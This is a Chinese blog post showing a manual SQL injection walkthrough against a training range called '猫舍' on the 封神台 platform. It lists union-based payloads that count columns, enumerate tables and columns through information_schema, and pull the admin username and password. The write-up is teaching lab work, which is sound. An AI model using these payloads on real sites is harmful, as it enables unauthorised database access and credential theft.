封神台 SQL注入 靶场 (猫舍)手动注入
封神台 SQL注入 靶场 (猫舍)手动注入
靶场地址 http://pu2lh35s.ia.aqlab.cn/?id=1
使用脚本
- 可以直接使用sqlmap脚本 直接 对这个地址进行测试 不过这样实在是太没意思了
- 这里使用的是 sqlmap 二次开发的 sqlmapplus 脚本 sqlmap 也是一样的
手动注入
判断是否存在 SQL注入漏洞
使用 order by 语句 判断数据库字段数
- 构造
?id=1 and 1=1 order by 1
页面没有变化(order by 1表示根据第一列来排序,一般也是如此默认升序的) - 再来依次构造order by 2 / order by 3
- 由MySQL的语法有,order by后面的数据超过列数后将会报错,因此用种方法来判断一共有几个字段
- order by 1/order by 2 都没有任何问题 但是 order by 3 报错了
使用联合查询判断回显点
- 回显点就是在页面中能显示数据库信息的板块,比如有的网页中“浏览次数”“发布时间”等,都反应的是数据库中的数据
- 在MySQL语句中,页面一次只能显示一行查询的内容,而且是先查后显示,于是我们需要让前面的语句?id=1 and 1=1这句话失效,从而显示
union select 1,2
的内容 - 因此我们让前一个命令报错无法显示,即构造?id=1 and 1=2,后面照常
union select 1,2
使用回显点 查询相关的数据
- 查询当前数据库的名称
- 已知2为回显点,我们只需要在联合查询时将2替代为我们想要查询到部位名称即可
- 可以查询当前的数据库名,将2替换为database()
- 构造id=1 and 1=2 union select 1,database()
- 数据库名为maoshe
- 查询数据库中的表名
- 构造
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
- limit 0,1的意思是从0开始,查询第1个数据
- 只要修改后面的 limit 0,1 /limit 1,1/limit 2,1 就可以看到后面的表名了
- 说明后面 的数据库的表 分别是 admin dirs news xss
- 而当后面是 limit 4,1 的时候 就是空白的 说明只有四张表 而管理员的信息一般都存在 admin 中
- 查询admin表的列名
- 构造
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
- 同样 修改后面的 limit 0,1 就可以看到 后面的列名 第一列是 id 第二列是 username 第三列 则是password
- 现在所有的信息都找到了 直接查询就可以了
- 查询需要的信息
- 构造
?id=1 and 1=2 union select 1,username from admin
- 构造
?id=1 and 1=2 union select 1,password from admin where username = 'admin'
结束
- Flag 已经找到了 也就是 管理员的密码 hellohack
__EOF__

本文作者:ZapcoMan
本文链接:https://www.cnblogs.com/ZapcoMan/p/18462066.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
本文链接:https://www.cnblogs.com/ZapcoMan/p/18462066.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
本文来自博客园,作者:ZapcoMan,转载请注明原文链接:https://www.cnblogs.com/ZapcoMan/p/18462066
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效